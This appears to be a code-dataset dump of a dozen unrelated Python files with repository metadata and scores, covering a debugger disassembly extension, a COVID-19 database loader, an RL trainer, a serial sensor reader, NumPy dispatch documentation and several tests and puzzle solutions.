@pytest.mark.asyncio
async def test_win_chat_announce_winners(self):
"""tests winning messages are called when the game is over"""
mock_subject = AsyncMock()
mock_subject.won = True
mock_subject.winning_team_id = 1
team_one = "Team 1"
team_names = ["User 1", "User 2"]
mock_subject.team_data = MagicMock()
mock_subject.team_data.get_team_member_map = MagicMock()
mock_subject.team_data.get_team_member_map.return_value = {1: ['id1', 'id2']}
winGameChatObserver = WinGameChatObserver()
winGameChatObserver.get_team_name = MagicMock()
winGameChatObserver.get_team_name.return_value = team_one
winGameChatObserver.get_usernames = MagicMock()
winGameChatObserver.get_usernames.return_value = team_names
await winGameChatObserver.update(mock_subject)
mock_subject.send_message.assert_called()
| 2.59375 | 3 |
vdb/extensions/arm.py | wisdark/vivisect | 716 | 12786801 | <reponame>wisdark/vivisect<gh_stars>100-1000
import envi
import envi.cli as e_cli
import envi.common as e_common
import envi.archs.arm.regs as e_arm_regs
import envi.archs.thumb16.disasm as e_thumb
def armdis(db, line):
'''
Disassemble arm instructions from the given address.
Usage: armdis <addr_exp>
'''
disasmobj = e_arm.ArmDisasm()
armthumdis(db, line, disasmobj)
def thumbdis(db, line):
'''
Disassemble thumb instructions from the given address.
Usage: thumbdis <addr_exp>
'''
disasmobj = e_thumb.ThumbDisasm()
armthumdis(db, line, disasmobj)
def armthumbdis(db, line, disasmobj):
'''
Core of disassmbly, for code-reuse. Only difference is the object actually
doing the disassembly.
'''
t = db.getTrace()
argv = e_cli.splitargs(line)
size = 20
argc = len(argv)
if argc == 0:
addr = t.getProgramCounter()
else:
addr = t.parseExpression(argv[0])
if argc > 1:
size = t.parseExpression(argv[1])
bytez = t.readMemory(addr, size)
offset = 0
db.vprint("Dissassembly:")
while offset < size:
va = addr + offset
op = disasmobj.disasm(bytez, offset, va)
obytez = bytez[offset:offset+len(op)]
db.canvas.addVaText('0x%.8x' % va, va=va)
db.canvas.addText(": %s " % e_common.hexify(obytez).ljust(17))
op.render(db.canvas)
db.canvas.addText("\n")
offset += len(op)
def togglethumb(db, line):
'''
Toggle Thumb Mode
'''
t = db.getTrace()
cur_t = t.getRegister(e_arm_regs.REG_T)
new_t = not cur_t
arch = (envi.ARCH_ARMV7, envi.ARCH_THUMB)[new_t]
t.setRegister(e_arm_regs.REG_T, new_t)
db.canvas.addText("Toggled Thumb Mode: %r\n" % new_t)
def vdbExtension(vdb, trace):
vdb.addCmdAlias('db', 'mem -F bytes')
vdb.addCmdAlias('dw', 'mem -F u_int_16')
vdb.addCmdAlias('dd', 'mem -F u_int_32')
vdb.addCmdAlias('dq', 'mem -F u_int_64')
vdb.addCmdAlias('dr', 'mem -F "Deref View"')
vdb.addCmdAlias('ds', 'mem -F "Symbols View"')
vdb.registerCmdExtension(armdis)
vdb.registerCmdExtension(thumbdis)
vdb.registerCmdExtension(togglethumb)
| 2.390625 | 2 |
LeetCode/Python3/TwoPointers/86. Partition List.py | WatsonWangZh/CodingPractice | 11 | 12786802 | <gh_stars>10-100
# Given a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x.
# You should preserve the original relative order of the nodes in each of the two partitions.
# Example:
# Input: head = 1->4->3->2->5->2, x = 3
# Output: 1->2->2->4->3->5
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def partition(self, head, x):
"""
:type head: ListNode
:type x: int
:rtype: ListNode
"""
# M1. 模拟
# 首先找到第一个大于或等于给定值的节点cur
# 然后再找小于给定值的节点,每找到一个就将其取出置于cur之前即可
dummy = ListNode(0)
dummy.next = head
pre, cur = dummy, head
while pre.next and pre.next.val < x:
pre = pre.next
cur = pre
while cur.next:
if cur.next.val < x:
tmp = cur.next
cur.next = tmp.next
tmp.next = pre.next
pre.next = tmp
pre = pre.next
else:
cur = cur.next
return dummy.next
# M2. 划分合并
# 将小于给定值和大于给定值的节点分别按原始先后顺序划分到两个链表中
# 然后再拼接成最后的结果返回即可
small_dummy, big_dummy = ListNode(0), ListNode(0)
small_cur, big_cur = small_dummy, big_dummy
while head:
if head.val < x:
small_cur.next = head
small_cur = head
else:
big_cur.next = head
big_cur = head
head = head.next
big_cur.next = None
small_cur.next = big_dummy.next
return small_dummy.next | 3.625 | 4 |
src/Filler.py | DjamelALI/covid-19-database | 0 | 12786803 | from . import Config, DIR_NAME
from .csv_tool import *
from .print_func import print_head
from .TemplateDir import TemplateDir, TEMPLATES_DIR
DIR_INSERT = TEMPLATES_DIR / "insert"
class Filler:
def __init__(self, config: Config):
self.config = config
self.template_dir = TemplateDir(DIR_INSERT)
@property
def psql(self):
return self.config.psql
@property
def path_data_source(self):
return self.config.path_data_source
def fill_sexe(self):
print("Remplissage de la table Sexe")
template = self.template_dir.get_template("sexe")
self.psql.execute_template(template)
def exec_template_file(self, name):
TemplateDir(DIR_INSERT / name).exec_all_file(self.psql)
def __fill_csv_simple(self, path, table, **kwargs):
print(f"Remplissage de la table {table} "
f"avec le fichier [{path}]")
with open(path, 'r') as f:
# skip header
next(f)
self.psql.copy(f, table, **kwargs)
def __fill_csv_apply_func(self, path: str, table: str,
info: tuple, sep=","):
columns = [x[0] for x in info]
funcs = [x[1] for x in info]
print(f"Remplissage de la table {table} "
f"avec le fichier [{path}]")
with open(path, 'r') as f:
# skip header
next(f)
values = []
for line in f.readlines():
line = tuple([f(l) for l, f in zip(line.split(sep), funcs)])
assert len(line) == len(funcs), f"{len(line)} != {len(funcs)}"
values.append(f"({', '.join(line)})")
values_str = ",\n".join(values)
request = f"INSERT INTO {table} ({','.join(columns)}) VALUES\n" \
f"{values_str};"
self.psql.execute(command=request)
def __recent_file_dir(self, name: str):
files = (self.path_data_source / DIR_NAME[name]).iterdir()
return max(files)
@property
def path_region(self):
return self.path_data_source / "regions-france.csv"
def fill_region(self):
self.__fill_csv_simple(self.path_region, "Region")
@property
def path_departement(self):
return self.path_data_source / "departements-france.csv"
def fill_departement(self):
self.exec_template_file("departement")
self.__fill_csv_simple(self.path_departement, "tempDepartement")
@property
def path_age_reg(self):
return self.__recent_file_dir("age")
@property
def info_age_reg(self):
return (("numReg", str_to_int),
("clAge90", str_to_int),
("jour", to_date),
("hospAge", to_int),
("reaAge", to_int),
("hospConvAge", int_or_null),
("ssrUsldAge", int_or_null),
("autreAge", int_or_null),
("radAge", to_int),
("dcAge", to_int))
def fill_age_reg(self, file_path=None):
if file_path is None:
file_path = self.path_age_reg
self.__fill_csv_apply_func(file_path,
table="AgesReg",
info=self.info_age_reg,
sep=";")
@property
def path_sexe_dep(self):
return self.__recent_file_dir("sexe")
@property
def info_sexe_dep(self):
return (("numDep", str_to_str),
("idSexe", str_to_int),
("jour", str_to_date),
("hospSexe", to_str),
("reaSexe", to_int),
("hospConvSexe", int_or_null),
("ssrUsldSexe", int_or_null),
("autreSexe", int_or_null),
("radSexe", to_int),
("dcSexe", to_int))
def fill_sexe_dep(self, file_path=None):
if file_path is None:
file_path = self.path_sexe_dep
self.exec_template_file("sexeDep")
self.__fill_csv_apply_func(file_path,
table="TempSexesDep",
info=self.info_sexe_dep,
sep=";")
self.psql.execute("SELECT insert_sexeDep_from_temp();")
@property
def path_incid_dep(self):
return self.__recent_file_dir("incid_dep")
@property
def path_incid_reg(self):
return self.__recent_file_dir("incid_reg")
@property
def path_service(self):
return self.__recent_file_dir("service")
@property
def info_incid_dep(self):
return \
(
("numDep", str_to_str),
("jour", to_date),
("incidHosp", to_int),
("incidRea", to_int),
("incidDc", to_int),
("incidRad", to_int),
)
def fill_incid_dep_tmp(self, path=None):
if path is None:
path = self.path_incid_dep
self.__fill_csv_apply_func(path, "TempIncidDep",
self.info_incid_dep, sep=';')
def fill_incid_reg_tmp(self, path=None):
if path is None:
path = self.path_incid_reg
self.__fill_csv_simple(path, "TempIncidReg", sep=';')
@property
def info_service(self):
return \
(
("numDep", str_to_str),
("jour", to_date),
("nbSvce", to_int),
)
def fill_service_tmp(self, path=None):
if path is None:
path = self.path_service
self.__fill_csv_apply_func(path, "TempService",
self.info_service, sep=';')
def fill_incidence(self, incid_dep=None, incid_reg=None, service_file=None):
self.exec_template_file("incidence")
print("Remplissage de la table Incidence")
self.fill_incid_dep_tmp(incid_dep)
self.fill_incid_reg_tmp(incid_reg)
self.fill_service_tmp(service_file)
self.psql.commit()
self.psql.execute("SELECT InsertIncidence();")
def fill_all(self):
print_head("REMPLISSAGE DES TABLES")
self.fill_sexe()
self.fill_region()
self.fill_departement()
self.psql.commit()
self.fill_age_reg()
self.fill_sexe_dep()
self.fill_incidence()
self.psql.commit()
| 2.65625 | 3 |
xmodaler/engine/rl_trainer.py | YehLi/xmodaler | 830 | 12786804 | # Copyright 2021 JD.com, Inc., JD AI
"""
@author: <NAME>
@contact: <EMAIL>
"""
import time
import copy
import torch
from .defaults import DefaultTrainer
from xmodaler.scorer import build_scorer
from xmodaler.config import kfg
from xmodaler.losses import build_rl_losses
import xmodaler.utils.comm as comm
from .build import ENGINE_REGISTRY
__all__ = ['RLTrainer']
@ENGINE_REGISTRY.register()
class RLTrainer(DefaultTrainer):
def __init__(self, cfg):
super(RLTrainer, self).__init__(cfg)
self.scorer = self.build_scorer(cfg)
self.losses = build_rl_losses(cfg)
@classmethod
def build_scorer(cls, cfg):
return build_scorer(cfg)
def run_step(self):
start = time.perf_counter()
try:
data = next(self._train_data_loader_iter)
except StopIteration:
self._train_data_loader_iter = iter(self.train_data_loader)
data = next(self._train_data_loader_iter)
data_time = time.perf_counter() - start
data = comm.unwrap_model(self.model).preprocess_batch(data)
self.model.eval()
with torch.no_grad():
bs_data = copy.copy(data)
bs_outputs_dict = self.model(bs_data, use_beam_search=False, output_sents=False)
bs_rewards = self.scorer(bs_outputs_dict)
self.model.train()
data[kfg.DECODE_BY_SAMPLE] = True
outputs_dict = self.model(data, use_beam_search=False, output_sents=False)
rewards = self.scorer(outputs_dict)
rewards = torch.from_numpy(rewards[kfg.REWARDS] - bs_rewards[kfg.REWARDS]).float().cuda()
outputs_dict.update({ kfg.REWARDS: rewards })
losses_dict = {}
for loss in self.losses:
loss_dict = loss(outputs_dict)
losses_dict.update(loss_dict)
losses = sum(losses_dict.values())
self.optimizer.zero_grad()
losses.backward()
bs_rewards.pop(kfg.REWARDS)
losses_dict.update(bs_rewards)
self._write_metrics(losses_dict, data_time)
self.optimizer.step() | 1.914063 | 2 |
utils/acs_utils.py | stephanballer/deepedgebench | 1 | 12786805 | <filename>utils/acs_utils.py
#!/usr/bin/python3
""" Circuit:
____________
| |
Uin _______________________| ACS712 5A |________ Uin device
| |____________|
_|_ | |
| | Imes |
R1 | | to A0 |
|___| |
|_________ Umes |
_|_ zu A1 |
| | |
R2 | | |
|_ _| GND |
| to AGND |
GND ________|______________|__________|__________ GND device
Arduino out: "A0 A1\n" in mV
I = (Umes / max_val) * 5000mV - 2500mV) / 185mV
R1: 10kO R2: 2.2kO
U = (Umes / max_val) * 5.0V * Rfac
Rfac = (R1 + R2) / R2
"""
from serial import Serial
from time import time, sleep
res_factor = (9.93 + 1.98) / 1.98
max_val = 1023.0
tolerance = 512
def acs_read(device_path, delay=0.1, file_path=None, calibrate=-1.0, zero_val=512.0):
ser = Serial(device_path, 9600)
rec = str()
if calibrate >= 0.0:
print("Calibrating for %d seconds..." % (calibrate))
rec += ser.read().decode('utf-8', errors='ignore')
sleep(calibrate)
rec += ser.read(ser.inWaiting()).decode('utf-8', errors='ignore')
num_list = list()
for line in rec.split("\n")[1:-1]:
nums = line.split()
if len(nums) == 2:
try:
num = float(nums[0])
if num >= 0.0 and num <= max_val:
num_list.append(num)
except ValueError:
pass
if len(num_list) > 0:
zero_val = sum(num_list)/len(num_list)
else:
print('Error: no readable data received')
exit()
usr_inp = input("%.2f analog input value in relation to 1023 or %.3fV in relation to ~5V as base value. Press any key to continue or \'q\' to exit\n" % (zero_val, (zero_val/max_val) * 5.0))
if len(usr_inp) > 0 and usr_inp[0] == "q":
exit()
rec = str()
if file_path is not None:
with open(file_path, 'w') as f:
f.write('serial_data\n')
while True:
rec += ser.read().decode('utf-8', errors='ignore')
sleep(delay)
rec += ser.read(ser.inWaiting()).decode('utf-8', errors='ignore')
timestamp = time()
rec_list = rec.split('\n')
rec = rec_list[-1]
vol_list, cur_list = list(), list()
for line in rec_list[:-1]:
nums = line.split()
if len(nums) == 2:
try:
cur_num, vol_num = float(nums[0]), float(nums[1])
if cur_num >= zero_val - tolerance and cur_num <= max_val and vol_num >= 0 and vol_num <= max_val:
voltage = (vol_num / max_val) * 5.0 * res_factor
vol_list.append(voltage)
current = ((cur_num - zero_val)/max_val) * 5000.0 / 185.0
cur_list.append(current)
except ValueError:
pass
if (len(vol_list) > 0):
voltage = sum(vol_list)/len(vol_list)
current = sum(cur_list)/len(cur_list)
if file_path is not None:
with open(file_path, 'a') as f:
f.write('%f %.8f %.8f\n' % (timestamp, current, voltage))
print('\x1b[1K\r%.6fA %.6fV %.6fW' % (current, voltage, current*voltage), end='')
ser.close()
| 2.640625 | 3 |
pyPLANES/fem/elements/surfacic_elements.py | matael/pyPLANES | 0 | 12786806 | <reponame>matael/pyPLANES
#! /usr/bin/env python
# -*- coding:utf8 -*-
#
# surfacic_elements.py
#
# This file is part of pyplanes, a software distributed under the MIT license.
# For any question, please contact one of the authors cited below.
#
# Copyright (c) 2020
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
import numpy as np
import numpy.linalg as LA
def imposed_Neumann(_elem):
coord_e = _elem.get_coordinates()
K_ref = _elem.reference_element
n, m = K_ref.Phi.shape
F = np.zeros(n)
for ipg in range(m):
_Phi = K_ref.Phi[:, ipg].reshape(n)
F += K_ref.w[ipg]*_Phi
F *= LA.norm(coord_e[:, 1]-coord_e[:, 0])/2.
return F
def imposed_pw_elementary_vector(_elem, k):
''' Calculus of I = int_{\Omega_e} e^{-jkx} Phi(x) dx
On the reference element:
I = (h/2)e^{-jkx-mid} * \int_{-1}^{1} e^{-jkhxi/2} \Phi(xi) dxi
'''
# Geometrical datas
coord_e = _elem.get_coordinates()
h = LA.norm(coord_e[:, 1]-coord_e[:, 0])
x_mid = min(coord_e[0, :]) + h/2.
k_prime = k*h/2.
F_analytical = _elem.reference_element.int_lobatto_exponential(k_prime)
return (h/2.)*np.exp(-1j*k*x_mid)*F_analytical
def fsi_elementary_matrix(_elem):
coord_e = _elem.get_coordinates()
K_ref = _elem.reference_element
n, m = K_ref.Phi.shape
M = np.zeros((n, n))
for ipg in range(m):
_Phi = K_ref.Phi[:, ipg].reshape(n)
M += K_ref.w[ipg]*np.dot(_Phi.reshape((n, 1)), _Phi.reshape((1, n)))
M *= LA.norm(coord_e[:, 1]-coord_e[:, 0])/2.
return M | 2.171875 | 2 |
QuantitativeEditing/audio_rendering.py | wjs018/QuantitativeEditing | 21 | 12786807 | <reponame>wjs018/QuantitativeEditing
import librosa
import matplotlib.pyplot as plt
import numpy as np
from moviepy.editor import *
from librosa.display import waveplot
from moviepy.video.io.bindings import mplfig_to_npimage
last_t = 0
tempgraph = []
def animate_audio(video, audio, output):
"""
Renders a waveform of a video's audio and progresses it every 0.5s as the
video plays.
Parameters
-----------
video
filepath to a video that has audio
audio
filepath to save the extracted audio from video as an .mp3
output
filepath to save the animated audio to as a .mp4
Returns
--------
output
Simply returns the filepath to the saved output video
"""
global last_t
global tempgraph
# Load video and extract audio to file
video_file = VideoFileClip(video)
extracted_audio = video_file.audio
extracted_audio.write_audiofile(audio)
# Load the saved audio into librosa
y, sr = librosa.load(audio, mono=False)
# Make a waveplot figure
fig, ax = plt.subplots(1, figsize=(12, 2), facecolor='white')
waveplot(y, sr=sr, color='b', alpha=0.25)
# Initialize some variables
last_t = 0
tempgraph = mplfig_to_npimage(fig)
# Function to animate our graph
def animate(t):
# Access our initialized variables from outside the function
global last_t
global tempgraph
# Round time to nearest 0.5 second. This limits the number of times we
# update the graph. Each graph update costs 10-20 seconds to draw, so by
# limiting this, we can render the graph an order of magnitude faster
temp_t = np.round(t * 2) / 2.0
# Only update the graph if we are at the next 0.5 seconds
if t > 0 and temp_t != last_t:
# Update our timekeeping variable
last_t = temp_t
# Delete the previous graph, otherwise we will keep plotting over
# the same graphs again and again
for coll in (ax.collections):
ax.collections.remove(coll)
# Load only the played portion of the mp3 and plot them
y2, sr2 = librosa.load('extracted_audio.mp3', mono=False,
duration=t)
waveplot(y2, sr=sr2, color='b', alpha=0.8)
waveplot(y, sr=sr, color='b', alpha=0.25)
# Update the output graph
tempgraph = mplfig_to_npimage(fig)
return tempgraph
# Make a video of the animated graph and save it
animation1 = VideoClip(animate, duration=video_file.duration)
animation1.write_videofile(output, fps=video_file.fps)
return output
if __name__ == '__main__':
# Import source video and extract the audio to an mp3
video = VideoFileClip('BTS_2017_DNA.mkv')
audio = video.audio
audio.write_audiofile('extracted_audio.mp3')
# Load the mp3 into librosa
y, sr = librosa.load('extracted_audio.mp3', mono=False)
# Make a waveplot figure
fig, ax = plt.subplots(1, figsize=(12, 2), facecolor='white')
waveplot(y, sr=sr, color='b', alpha=0.25)
# Initialize some variables
last_t = 0
tempgraph = mplfig_to_npimage(fig)
# Function to animate our graph
def animate1(t):
# Access our initialized variables from outside the function
global last_t
global tempgraph
# Round time to nearest 0.5 second. This limits the number of times we
# update the graph. Each graph update costs 10-20 seconds to draw, so by
# limiting this, we can render the graph an order of magnitude faster
temp_t = np.round(t * 2) / 2.0
# Only update the graph if we are at the next 0.5 seconds
if t > 0 and temp_t != last_t:
# Update our timekeeping variable
last_t = temp_t
# Delete the previous graph, otherwise we will keep plotting over
# the same graphs again and again
for coll in (ax.collections):
ax.collections.remove(coll)
# Load only the played portion of the mp3 and plot them
y2, sr2 = librosa.load('extracted_audio.mp3', mono=False,
duration=t)
waveplot(y2, sr=sr2, color='b', alpha=0.8)
waveplot(y, sr=sr, color='b', alpha=0.25)
# Update the output graph
tempgraph = mplfig_to_npimage(fig)
return tempgraph
# Make a video of the animated graph and save it
animation1 = VideoClip(animate1, duration=video.duration)
animation1.write_videofile('audio_animation1.mp4', fps=video.fps)
| 3.328125 | 3 |
tests/test_duplicated_link.py | mhbl3/matlabdomain | 38 | 12786808 | <reponame>mhbl3/matlabdomain<filename>tests/test_duplicated_link.py<gh_stars>10-100
# -*- coding: utf-8 -*-
"""
test_package_links.py
~~~~~~~~~~~~
Test the autodoc extension.
:copyright: Copyright 2007-2018 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import unicode_literals
import pickle
import os
import sys
import docutils
import pytest
from sphinx import addnodes
from sphinx import version_info
from sphinx.testing.fixtures import test_params, make_app
from sphinx.testing.path import path
@pytest.fixture(scope='module')
def rootdir():
return path(os.path.dirname(__file__)).abspath()
@pytest.mark.skipif(sys.version_info < (3, 6), reason="requires python3.6 or higher")
def test_with_prefix(make_app, rootdir):
srcdir = rootdir / 'roots' / 'test_duplicate_link'
app = make_app(srcdir=srcdir)
app.builder.build_all()
content = pickle.loads((app.doctreedir / 'groups.doctree').read_bytes())
assert isinstance(content[0], docutils.nodes.section)
section = content[0][7]
assert section.astext() == 'NiceFiniteGroup\n\n\n\nclass +replab.NiceFiniteGroup\n\nBases: +replab.FiniteGroup\n\nA nice finite group is a finite group equipped with an injective homomorphism into a permutation group\n\nReference that triggers the error: eqv'
@pytest.mark.skipif(sys.version_info < (3, 6), reason="requires python3.6 or higher")
def test_without_prefix(make_app, rootdir):
srcdir = rootdir / 'roots' / 'test_duplicate_link'
confdict = { 'matlab_keep_package_prefix' : False }
app = make_app(srcdir=srcdir, confoverrides=confdict)
app.builder.build_all()
content = pickle.loads((app.doctreedir / 'groups.doctree').read_bytes())
assert isinstance(content[0], docutils.nodes.section)
section = content[0][7]
assert section.astext() == 'NiceFiniteGroup\n\n\n\nclass replab.NiceFiniteGroup\n\nBases: replab.FiniteGroup\n\nA nice finite group is a finite group equipped with an injective homomorphism into a permutation group\n\nReference that triggers the error: eqv'
if __name__ == '__main__':
pytest.main([__file__]) | 1.820313 | 2 |
numpy/doc/dispatch.py | Soniyanayak51/numpy | 1 | 12786809 | <reponame>Soniyanayak51/numpy
""".. _dispatch_mechanism:
Numpy's dispatch mechanism, introduced in numpy version v1.16 is the
recommended approach for writing custom N-dimensional array containers that are
compatible with the numpy API and provide custom implementations of numpy
functionality. Applications include `dask <http://dask.pydata.org>`_ arrays, an
N-dimensional array distributed across multiple nodes, and `cupy
<https://docs-cupy.chainer.org/en/stable/>`_ arrays, an N-dimensional array on
a GPU.
To get a feel for writing custom array containers, we'll begin with a simple
example that has rather narrow utility but illustrates the concepts involved.
>>> import numpy as np
>>> class DiagonalArray:
... def __init__(self, N, value):
... self._N = N
... self._i = value
... def __repr__(self):
... return f"{self.__class__.__name__}(N={self._N}, value={self._i})"
... def __array__(self):
... return self._i * np.eye(self._N)
...
Our custom array can be instantiated like:
>>> arr = DiagonalArray(5, 1)
>>> arr
DiagonalArray(N=5, value=1)
We can convert to a numpy array using :func:`numpy.array` or
:func:`numpy.asarray`, which will call its ``__array__`` method to obtain a
standard ``numpy.ndarray``.
>>> np.asarray(arr)
array([[1., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 0., 0., 1.]])
If we operate on ``arr`` with a numpy function, numpy will again use the
``__array__`` interface to convert it to an array and then apply the function
in the usual way.
>>> np.multiply(arr, 2)
array([[2., 0., 0., 0., 0.],
[0., 2., 0., 0., 0.],
[0., 0., 2., 0., 0.],
[0., 0., 0., 2., 0.],
[0., 0., 0., 0., 2.]])
Notice that the return type is a standard ``numpy.ndarray``.
>>> type(arr)
numpy.ndarray
How can we pass our custom array type through this function? Numpy allows a
class to indicate that it would like to handle computations in a custom-defined
way through the interaces ``__array_ufunc__`` and ``__array_function__``. Let's
take one at a time, starting with ``_array_ufunc__``. This method covers
:ref:`ufuncs`, a class of functions that includes, for example,
:func:`numpy.multiply` and :func:`numpy.sin`.
The ``__array_ufunc__`` receives:
- ``ufunc``, a function like ``numpy.multiply``
- ``method``, a string, differentiating between ``numpy.multiply(...)`` and
variants like ``numpy.multiply.outer``, ``numpy.multiply.accumulate``, and so
on. For the common case, ``numpy.multiply(...)``, ``method == '__call__'``.
- ``inputs``, which could be a mixture of different types
- ``kwargs``, keyword arguments passed to the function
For this example we will only handle the method ``__call__``.
>>> from numbers import Number
>>> class DiagonalArray:
... def __init__(self, N, value):
... self._N = N
... self._i = value
... def __repr__(self):
... return f"{self.__class__.__name__}(N={self._N}, value={self._i})"
... def __array__(self):
... return self._i * np.eye(self._N)
... def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):
... if method == '__call__':
... N = None
... scalars = []
... for input in inputs:
... if isinstance(input, Number):
... scalars.append(input)
... elif isinstance(input, self.__class__):
... scalars.append(input._i)
... if N is not None:
... if N != self._N:
... raise TypeError("inconsistent sizes")
... else:
... N = self._N
... else:
... return NotImplemented
... return self.__class__(N, ufunc(*scalars, **kwargs))
... else:
... return NotImplemented
...
Now our custom array type passes through numpy functions.
>>> arr = DiagonalArray(5, 1)
>>> np.multiply(arr, 3)
DiagonalArray(N=5, value=3)
>>> np.add(arr, 3)
DiagonalArray(N=5, value=4)
>>> np.sin(arr)
DiagonalArray(N=5, value=0.8414709848078965)
At this point ``arr + 3`` does not work.
>>> arr + 3
TypeError: unsupported operand type(s) for *: 'DiagonalArray' and 'int'
To support it, we need to define the Python interfaces ``__add__``, ``__lt__``,
and so on to dispatch to the corresponding ufunc. We can achieve this
conveniently by inheriting from the mixin
:class:`~numpy.lib.mixins.NDArrayOperatorsMixin`.
>>> import numpy.lib.mixins
>>> class DiagonalArray(numpy.lib.mixins.NDArrayOperatorsMixin):
... def __init__(self, N, value):
... self._N = N
... self._i = value
... def __repr__(self):
... return f"{self.__class__.__name__}(N={self._N}, value={self._i})"
... def __array__(self):
... return self._i * np.eye(self._N)
... def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):
... if method == '__call__':
... N = None
... scalars = []
... for input in inputs:
... if isinstance(input, Number):
... scalars.append(input)
... elif isinstance(input, self.__class__):
... scalars.append(input._i)
... if N is not None:
... if N != self._N:
... raise TypeError("inconsistent sizes")
... else:
... N = self._N
... else:
... return NotImplemented
... return self.__class__(N, ufunc(*scalars, **kwargs))
... else:
... return NotImplemented
...
>>> arr = DiagonalArray(5, 1)
>>> arr + 3
DiagonalArray(N=5, value=4)
>>> arr > 0
DiagonalArray(N=5, value=True)
Now let's tackle ``__array_function__``. We'll create dict that maps numpy
functions to our custom variants.
>>> HANDLED_FUNCTIONS = {}
>>> class DiagonalArray(numpy.lib.mixins.NDArrayOperatorsMixin):
... def __init__(self, N, value):
... self._N = N
... self._i = value
... def __repr__(self):
... return f"{self.__class__.__name__}(N={self._N}, value={self._i})"
... def __array__(self):
... return self._i * np.eye(self._N)
... def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):
... if method == '__call__':
... N = None
... scalars = []
... for input in inputs:
... # In this case we accept only scalar numbers or DiagonalArrays.
... if isinstance(input, Number):
... scalars.append(input)
... elif isinstance(input, self.__class__):
... scalars.append(input._i)
... if N is not None:
... if N != self._N:
... raise TypeError("inconsistent sizes")
... else:
... N = self._N
... else:
... return NotImplemented
... return self.__class__(N, ufunc(*scalars, **kwargs))
... else:
... return NotImplemented
... def __array_function__(self, func, types, args, kwargs):
... if func not in HANDLED_FUNCTIONS:
... return NotImplemented
... # Note: this allows subclasses that don't override
... # __array_function__ to handle DiagonalArray objects.
... if not all(issubclass(t, self.__class__) for t in types):
... return NotImplemented
... return HANDLED_FUNCTIONS[func](*args, **kwargs)
...
A convenient pattern is to define a decorator ``implements`` that can be used
to add functions to ``HANDLED_FUNCTIONS``.
>>> def implements(np_function):
... "Register an __array_function__ implementation for DiagonalArray objects."
... def decorator(func):
... HANDLED_FUNCTIONS[np_function] = func
... return func
... return decorator
...
Now we write implementations of numpy functions for ``DiagonalArray``.
For completeness, to support the usage ``arr.sum()`` add a method ``sum`` that
calls ``numpy.sum(self)``, and the same for ``mean``.
>>> @implements(np.sum)
... def sum(arr):
... "Implementation of np.sum for DiagonalArray objects"
... return arr._i * arr._N
...
>>> @implements(np.mean)
... def sum(arr):
... "Implementation of np.mean for DiagonalArray objects"
... return arr._i / arr._N
...
>>> arr = DiagonalArray(5, 1)
>>> np.sum(arr)
5
>>> np.mean(arr)
0.2
If the user tries to use any numpy functions not included in
``HANDLED_FUNCTIONS``, a ``TypeError`` will be raised by numpy, indicating that
this operation is not supported. For example, concatenating two
``DiagonalArrays`` does not produce another diagonal array, so it is not
supported.
>>> np.concatenate([arr, arr])
TypeError: no implementation found for 'numpy.concatenate' on types that implement __array_function__: [<class '__main__.DiagonalArray'>]
Additionally, our implementations of ``sum`` and ``mean`` do not accept the
optional arguments that numpy's implementation does.
>>> np.sum(arr, axis=0)
TypeError: sum() got an unexpected keyword argument 'axis'
The user always has the option of converting to a normal ``numpy.ndarray`` with
:func:`numpy.asarray` and using standard numpy from there.
>>> np.concatenate([np.asarray(arr), np.asarray(arr)])
array([[1., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 0., 0., 1.],
[1., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 0., 0., 1.]])
Refer to the `dask source code <https://github.com/dask/dask>`_ and
`cupy source code <https://github.com/cupy/cupy>`_ for more fully-worked
examples of custom array containers.
See also `NEP 18 <http://www.numpy.org/neps/nep-0018-array-function-protocol.html>`_.
"""
| 3.09375 | 3 |
5/005_smallest_divisible_by_1_through_20.py | the-gigi/project-euler | 7 | 12786810 | <filename>5/005_smallest_divisible_by_1_through_20.py
"""Smallest Multiple - https://projecteuler.net/problem=5
2520 is the smallest number that can be divided by each of the numbers from
1 to 10 without any remainder.
What is the smallest positive number that is evenly divisible by all of the
numbers from 1 to 20?
"""
def get_prime_product(n):
"""Return a dictionary with prime keys and exponent values
The product of all the keys raised to their exponent is the number
For example: 20 = 2 ** 2 * 5 -> {2: 2, 5:1}
"""
primes_to_20 = (2, 3, 5, 7, 11, 13, 17, 19)
if n in primes_to_20:
return {n: 1}
result = {k: 0 for k in primes_to_20}
for p in primes_to_20:
while n % p == 0:
result[p] += 1
n /= p
result = {k: v for k, v in result.iteritems() if v > 0}
return result
numbers = range(20, 2, -1)
result = {}
for n in numbers:
prime_product = get_prime_product(n)
for k, v in prime_product.iteritems():
if k not in result:
result[k] = v
elif v > result[k]:
result[k] = v
final_number = 1
for k, v in result.iteritems():
final_number *= k ** v
assert 232792560 == final_number
| 3.921875 | 4 |
tests/segment.py | soootaleb/spare | 1 | 12786811 | import unittest, random
from models.point import Point
from models.segment import Segment
import numpy as np
class TestSegmentMethods(unittest.TestCase):
def test_new(self):
with self.assertRaises(ValueError) as context:
Segment([])
def test_extremums(self):
a = Point(random.randint(0, 100), random.randint(0, 100))
b = Point(random.randint(0, 100), random.randint(0, 100))
c = Point(random.randint(0, 100), random.randint(0, 100))
segment = Segment([a, b, c])
self.assertEqual(segment.start, a)
self.assertEqual(segment.end, c)
def test_getitem(self):
a = Point(10, 20)
b = Point(20, 30)
c = Point(30, 40)
segment = Segment([a, b, c])
self.assertEqual(segment[Point(10, 20)], a) # Access by point
